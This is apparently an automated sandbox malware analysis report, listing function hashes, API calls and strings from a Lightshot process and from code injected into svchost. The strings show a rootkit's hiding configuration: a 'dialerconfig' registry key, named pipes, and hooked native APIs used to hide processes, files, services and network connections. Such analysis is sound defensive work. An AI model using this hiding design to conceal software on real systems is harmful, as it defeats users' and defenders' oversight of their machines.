                                                                                Similarity
                                                                                • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                                                • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                                                • API String ID: 2595394609-2123141913
                                                                                • Opcode ID: ddbdcf1874e9ea71757a48b7d804bab9f2fa45dded7038c380b0ba63e0422925
                                                                                • Instruction ID: 7d9f556c0a0f617faaf7a10b2cbbc2846e4be2b8900ee8b83261e430942f1232
                                                                                • Opcode Fuzzy Hash: ddbdcf1874e9ea71757a48b7d804bab9f2fa45dded7038c380b0ba63e0422925
                                                                                • Instruction Fuzzy Hash: 7541A27BA0868381EA109B26D484BBD2760EF99F80F145232DD0DC37A1DE3EF549C30A

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000025.00000002.2130393951.00007FF6E4D81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E4D80000, based on PE: true
                                                                                • Associated: 00000025.00000002.2130104315.00007FF6E4D80000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000025.00000002.2130472131.00007FF6E4D8B000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000025.00000002.2130557620.00007FF6E4D8E000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000025.00000002.2131279652.00007FF6E5042000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000025.00000002.2131447980.00007FF6E5045000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_37_2_7ff6e4d80000_Lightshot.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$DeleteEnterErrorLastLeaveValue
                                                                                • String ID:
                                                                                • API String ID: 926137887-0
                                                                                • Opcode ID: 613fdf5728c7ed6876bd790cebaa614c9071348df8fdca610d58b176e96f82e5
                                                                                • Instruction ID: 738dd0c6b4897373c2948e46fab0aa14dd54e57a5aec0cf96fac173ef55075f0
                                                                                • Opcode Fuzzy Hash: 613fdf5728c7ed6876bd790cebaa614c9071348df8fdca610d58b176e96f82e5
                                                                                • Instruction Fuzzy Hash: B0212E2BE0964386FA19AB61E99477423A0BF19F90F541631DD0DC76A4CF2FBC85830A

                                                                                Control-flow Graph

                                                                                • Graph data (rendered image omitted): basic blocks 7ff6e4d81e10-7ff6e4d81f69; calls: signal, 7ff6e4d89ff0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000025.00000002.2130393951.00007FF6E4D81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E4D80000, based on PE: true
                                                                                • Associated: 00000025.00000002.2130104315.00007FF6E4D80000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000025.00000002.2130472131.00007FF6E4D8B000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000025.00000002.2130557620.00007FF6E4D8E000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000025.00000002.2131279652.00007FF6E5042000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000025.00000002.2131447980.00007FF6E5045000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_37_2_7ff6e4d80000_Lightshot.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: CCG
                                                                                • API String ID: 0-1584390748
                                                                                • Opcode ID: 8ffd1e83da114adb7a12425d872c4067a8ab9974e88a3fba3c75f53be1714557
                                                                                • Instruction ID: 687a3fad5d91776c2edbc2d6bda399077aaeaefdc0654cd73eb97be54f50f6f0
                                                                                • Opcode Fuzzy Hash: 8ffd1e83da114adb7a12425d872c4067a8ab9974e88a3fba3c75f53be1714557
                                                                                • Instruction Fuzzy Hash: 7A217F2BE0C18741FA79523495D037D11819F8C764F28A336D90EC32DADE2EB8C9824B

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000025.00000002.2130393951.00007FF6E4D81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E4D80000, based on PE: true
                                                                                • Associated: 00000025.00000002.2130104315.00007FF6E4D80000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000025.00000002.2130472131.00007FF6E4D8B000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000025.00000002.2130557620.00007FF6E4D8E000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000025.00000002.2131279652.00007FF6E5042000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000025.00000002.2131447980.00007FF6E5045000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_37_2_7ff6e4d80000_Lightshot.jbxd
                                                                                Similarity
                                                                                • API ID: wcslen
                                                                                • String ID: 0$@
                                                                                • API String ID: 4088430540-1545510068
                                                                                • Opcode ID: 8bc87b3cca2c78adc28c7b1354bc797d6113aeb12ee74f16880f0486ba838264
                                                                                • Instruction ID: e3c3a1f23b8c482a2cc228e0911a0252aec5947fd6e514883d78f39c1d2f002f
                                                                                • Opcode Fuzzy Hash: 8bc87b3cca2c78adc28c7b1354bc797d6113aeb12ee74f16880f0486ba838264
                                                                                • Instruction Fuzzy Hash: 42116D225286C182E350DB25F4867AEB374EFD8394F505225F68D83B69EF7ED14ACB01

                                                                                Control-flow Graph

                                                                                • Graph data (rendered image omitted): basic blocks 7ff6e4d81880-7ff6e4d81b98; calls: 7ff6e4d82420, 7ff6e4d82660, 7ff6e4d81ba0, 7ff6e4d81d40, VirtualProtect
                                                                                APIs
                                                                                • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6E4D81247), ref: 00007FF6E4D819F9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000025.00000002.2130393951.00007FF6E4D81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E4D80000, based on PE: true
                                                                                • Associated: 00000025.00000002.2130104315.00007FF6E4D80000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000025.00000002.2130472131.00007FF6E4D8B000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000025.00000002.2130557620.00007FF6E4D8E000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000025.00000002.2131279652.00007FF6E5042000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000025.00000002.2131447980.00007FF6E5045000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_37_2_7ff6e4d80000_Lightshot.jbxd
                                                                                Similarity
                                                                                • API ID: ProtectVirtual
                                                                                • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                                                • API String ID: 544645111-395989641
                                                                                • Opcode ID: f047dfd43f2b20f4878765ae852215213f87511333d9653e63cf908346f9a17d
                                                                                • Instruction ID: 824cb384d5ecf11bb6418f9fb1497abcaa6a0e8aa6d5bdaa4768260aa0325ef9
                                                                                • Opcode Fuzzy Hash: f047dfd43f2b20f4878765ae852215213f87511333d9653e63cf908346f9a17d
                                                                                • Instruction Fuzzy Hash: D551603BF08587C6EB109B35D8857782761AB19B94F446331E91C877A9CF3EE486C70A

                                                                                Control-flow Graph

                                                                                • Graph data (rendered image omitted): basic blocks 7ff6e4d81800-7ff6e4d81867; calls: 7ff6e4d82290, fprintf
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000025.00000002.2130393951.00007FF6E4D81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E4D80000, based on PE: true
                                                                                • Associated: 00000025.00000002.2130104315.00007FF6E4D80000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000025.00000002.2130472131.00007FF6E4D8B000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000025.00000002.2130557620.00007FF6E4D8E000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000025.00000002.2131279652.00007FF6E5042000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000025.00000002.2131447980.00007FF6E5045000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_37_2_7ff6e4d80000_Lightshot.jbxd
                                                                                Similarity
                                                                                • API ID: fprintf
                                                                                • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                • API String ID: 383729395-3474627141
                                                                                • Opcode ID: 1c04987d95cc1312a9d89c4e69c05c1118544e67408b6cf4f97d1d5589193830
                                                                                • Instruction ID: 8f3d81d6acc1e612f5706618cc18e964fff7cfcedf1e1de8d25c72951e46a20d
                                                                                • Opcode Fuzzy Hash: 1c04987d95cc1312a9d89c4e69c05c1118544e67408b6cf4f97d1d5589193830
                                                                                • Instruction Fuzzy Hash: 38F0F617E18A8682E2109B34A9812BDA3B0EF4D3C0F40A331EE8ED7255DF2DF182C305

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000025.00000002.2130393951.00007FF6E4D81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E4D80000, based on PE: true
                                                                                • Associated: 00000025.00000002.2130104315.00007FF6E4D80000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000025.00000002.2130472131.00007FF6E4D8B000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000025.00000002.2130557620.00007FF6E4D8E000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000025.00000002.2131279652.00007FF6E5042000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000025.00000002.2131447980.00007FF6E5045000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_37_2_7ff6e4d80000_Lightshot.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                                                • String ID:
                                                                                • API String ID: 682475483-0
                                                                                • Opcode ID: 5eff3f75befce3e92e47b05016d9c5d0d24caf54b52fc201209ce42e40f93eef
                                                                                • Instruction ID: 3c5dc22c1df52a2665a7fbbdb78cd200c2d6258ca75aa6da50c4746e34337033
                                                                                • Opcode Fuzzy Hash: 5eff3f75befce3e92e47b05016d9c5d0d24caf54b52fc201209ce42e40f93eef
                                                                                • Instruction Fuzzy Hash: D9012C2BA0D64386F6159B65ED9437823A0BF1CFD0F542231CE0DC36A4DF2EA895C30A

                                                                                Execution Graph

                                                                                Execution Coverage:0.7%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:81
                                                                                Total number of Limit Nodes:2

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308976773.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                                • String ID:
                                                                                • API String ID: 1683269324-0
                                                                                • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                                • Instruction ID: b559a2181ff40e2a117a780b745b7d932bb3298ad3057c49ecb9ab2035d3dd06
                                                                                • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                                • Instruction Fuzzy Hash: 9C11C030A12F0C82FB72ABE9F9387D923D7A784B85F504124DA06E1EA5EFB9C044C350

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 00000195DD5C1628: GetProcessHeap.KERNEL32 ref: 00000195DD5C1633
                                                                                  • Part of subcall function 00000195DD5C1628: HeapAlloc.KERNEL32 ref: 00000195DD5C1642
                                                                                  • Part of subcall function 00000195DD5C1628: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C16B2
                                                                                  • Part of subcall function 00000195DD5C1628: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C16DF
                                                                                  • Part of subcall function 00000195DD5C1628: RegCloseKey.ADVAPI32 ref: 00000195DD5C16F9
                                                                                  • Part of subcall function 00000195DD5C1628: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C1719
                                                                                  • Part of subcall function 00000195DD5C1628: RegCloseKey.ADVAPI32 ref: 00000195DD5C1734
                                                                                  • Part of subcall function 00000195DD5C1628: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C1754
                                                                                  • Part of subcall function 00000195DD5C1628: RegCloseKey.ADVAPI32 ref: 00000195DD5C176F
                                                                                  • Part of subcall function 00000195DD5C1628: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C178F
                                                                                  • Part of subcall function 00000195DD5C1628: RegCloseKey.ADVAPI32 ref: 00000195DD5C17AA
                                                                                  • Part of subcall function 00000195DD5C1628: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C17CA
                                                                                • Sleep.KERNEL32 ref: 00000195DD5C1AD7
                                                                                • SleepEx.KERNELBASE ref: 00000195DD5C1ADD
                                                                                  • Part of subcall function 00000195DD5C1628: RegCloseKey.ADVAPI32 ref: 00000195DD5C17E5
                                                                                  • Part of subcall function 00000195DD5C1628: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C1805
                                                                                  • Part of subcall function 00000195DD5C1628: RegCloseKey.ADVAPI32 ref: 00000195DD5C1820
                                                                                  • Part of subcall function 00000195DD5C1628: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C1840
                                                                                  • Part of subcall function 00000195DD5C1628: RegCloseKey.ADVAPI32 ref: 00000195DD5C185B
                                                                                  • Part of subcall function 00000195DD5C1628: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C187B
                                                                                  • Part of subcall function 00000195DD5C1628: RegCloseKey.ADVAPI32 ref: 00000195DD5C1896
                                                                                  • Part of subcall function 00000195DD5C1628: RegCloseKey.ADVAPI32 ref: 00000195DD5C18A0
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308976773.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                                • String ID:
                                                                                • API String ID: 1534210851-0
                                                                                • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                                • Instruction ID: f3b7e964aa4799e71de0d0524ef43308711ea80b0fc304bbb8b55dd9ae371198
                                                                                • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                                • Instruction Fuzzy Hash: C7315171202E0951FF52ABAADA70BE963E7AB54BD4F0454218E0EE7FD5FE20C861C750

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308976773.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: dialer
                                                                                • API String ID: 0-3528709123
                                                                                • Opcode ID: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                                                • Instruction ID: 8525adf6a2d64dd7061414e58bca951bdbbd2a01b88122cd2fc985ec43bc3963
                                                                                • Opcode Fuzzy Hash: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                                                • Instruction Fuzzy Hash: 89D0A770353B0DC7FF26DFEA88E46E423E2EB08744F884030C90052A50DB18898D9B20

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308832875.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd590000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 1029625771-0
                                                                                • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                • Instruction ID: 3c42989a6f1da65d8c668265381177c755b331e9ddf0642a5a91f75fe2288bf4
                                                                                • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                • Instruction Fuzzy Hash: DF612632B01A90C7DB56CF65D020BBD73D7F754BA4F988125DE5927B88DA38D892CB00

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308976773.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                                • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                                • API String ID: 2119608203-3850299575
                                                                                • Opcode ID: b269dd2d9b81f1812a6309050772eb1d9569a02fca7367e1bad0c42bb49a5ac5
                                                                                • Instruction ID: dde7fd9efa89a5466707bb46948bcd2f38f9c7ac15f82b741b3087f18559b81d
                                                                                • Opcode Fuzzy Hash: b269dd2d9b81f1812a6309050772eb1d9569a02fca7367e1bad0c42bb49a5ac5
                                                                                • Instruction Fuzzy Hash: 40B1AF76212E5882EB669FA9D460BE973E6FB54B84F485016EE09B3F94EF34CC41C740
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308976773.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                • String ID:
                                                                                • API String ID: 3140674995-0
                                                                                • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                                • Instruction ID: fc690ca620e4485241193952ba8c83509054a4c62fcfc94005514e0c22233189
                                                                                • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                                • Instruction Fuzzy Hash: B0314F72205F848AEB619FA4E8607ED73E5F784744F44442ADA4EA7F98EF38C549C710
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308976773.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                • String ID:
                                                                                • API String ID: 1239891234-0
                                                                                • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                                • Instruction ID: 88954bb95814ee6b498564cf1bdcac9ec7b9223e226e11f4f982859e9a819e51
                                                                                • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                                • Instruction Fuzzy Hash: 77313A32215F8486EB618B69E8503DE73E5F789794F500126EA9D93F98EF38C546CB00

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308976773.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                                • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                • API String ID: 106492572-2879589442
                                                                                • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                                • Instruction ID: 3fed60f760ab3f32da691e52dbf4ab303354c7f47779857e17f14048716fb99a
                                                                                • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                                • Instruction Fuzzy Hash: A1711C36311F1886EB119FA6E860AD923F6FB85B89F005111DE4EA7F69EF34C485C750

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308976773.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                                • String ID: d
                                                                                • API String ID: 2005889112-2564639436
                                                                                • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                                • Instruction ID: 495f4bd1ccfcfb5c7fe309b38a271ae55a6fce5f460d804d76d8676db85ca4e3
                                                                                • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                                • Instruction Fuzzy Hash: 30515B36201F8886EB51CFA6E46879A77E2F789F89F044124DA4957B18DF3CC04ACB10

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308976773.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread$AddressHandleModuleProc
                                                                                • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                                • API String ID: 4175298099-1975688563
                                                                                • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                                • Instruction ID: 0a117424bb8ec17e06fa24497d1726645dd05d6d29179111a98c9b800477247c
                                                                                • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                                • Instruction Fuzzy Hash: D1318274142E4EE0FB17EFE9E871AE463E3B714398FC450139449B2E759E78824AD760

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308832875.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd590000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                                • API String ID: 190073905-1786718095
                                                                                • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction ID: ceb190c1bc5cb76a39468d0dcf2336ec5ebfdbce9e152840d3fa6cc9d2bd33da
                                                                                • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction Fuzzy Hash: 6381CE72704E41C6FB52ABE594713D926E3EB96B80F548025EA0577F96EF38C84A8F00

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetLastError.KERNEL32 ref: 00000195DD5CCE37
                                                                                • FlsGetValue.KERNEL32(?,?,?,00000195DD5D0A6B,?,?,?,00000195DD5D045C,?,?,?,00000195DD5CC84F), ref: 00000195DD5CCE4C
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000195DD5D0A6B,?,?,?,00000195DD5D045C,?,?,?,00000195DD5CC84F), ref: 00000195DD5CCE6D
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000195DD5D0A6B,?,?,?,00000195DD5D045C,?,?,?,00000195DD5CC84F), ref: 00000195DD5CCE9A
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000195DD5D0A6B,?,?,?,00000195DD5D045C,?,?,?,00000195DD5CC84F), ref: 00000195DD5CCEAB
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000195DD5D0A6B,?,?,?,00000195DD5D045C,?,?,?,00000195DD5CC84F), ref: 00000195DD5CCEBC
                                                                                • SetLastError.KERNEL32 ref: 00000195DD5CCED7
                                                                                • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000195DD5D0A6B,?,?,?,00000195DD5D045C,?,?,?,00000195DD5CC84F), ref: 00000195DD5CCF0D
                                                                                • FlsSetValue.KERNEL32(?,?,00000001,00000195DD5CECCC,?,?,?,?,00000195DD5CBF9F,?,?,?,?,?,00000195DD5C7AB0), ref: 00000195DD5CCF2C
                                                                                  • Part of subcall function 00000195DD5CD6CC: HeapAlloc.KERNEL32 ref: 00000195DD5CD721
                                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000195DD5D0A6B,?,?,?,00000195DD5D045C,?,?,?,00000195DD5CC84F), ref: 00000195DD5CCF54
                                                                                  • Part of subcall function 00000195DD5CD744: HeapFree.KERNEL32 ref: 00000195DD5CD75A
                                                                                  • Part of subcall function 00000195DD5CD744: GetLastError.KERNEL32 ref: 00000195DD5CD764
                                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000195DD5D0A6B,?,?,?,00000195DD5D045C,?,?,?,00000195DD5CC84F), ref: 00000195DD5CCF65
                                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000195DD5D0A6B,?,?,?,00000195DD5D045C,?,?,?,00000195DD5CC84F), ref: 00000195DD5CCF76
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308976773.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Value$ErrorLast$Heap$AllocFree
                                                                                • String ID:
                                                                                • API String ID: 570795689-0
                                                                                • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                                • Instruction ID: 5deeaa700c7bca527ac3e0ef52b0542e40d86773dc9f6c8a69b3fdc468513023
                                                                                • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                                • Instruction Fuzzy Hash: B5412034303E4C82FB6BA7EE59753F913C35B857B4F140724A936E6ED6DE2894818700

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308976773.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                                • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                                • API String ID: 2171963597-1373409510
                                                                                • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                                • Instruction ID: ef64e02e287f94d0d9415c348699ab4dc805c8a96bd9a803ab77d90ce42376f4
                                                                                • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                                • Instruction Fuzzy Hash: 09217932614B4483FB118BA5F4647AA73E2F789BA5F544215EA5953FA8CF3CC14ACB00

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308976773.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                • String ID: csm$csm$csm
